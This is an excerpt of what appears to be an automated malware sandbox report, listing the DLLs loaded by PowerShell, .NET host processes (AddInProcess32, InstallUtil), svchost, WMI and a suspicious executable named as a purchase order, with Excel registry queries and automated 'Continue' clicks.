Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: libcares-2.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: msvcp290.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: icu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: libcares-2.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: msvcp290.dll
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Section loaded: icu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
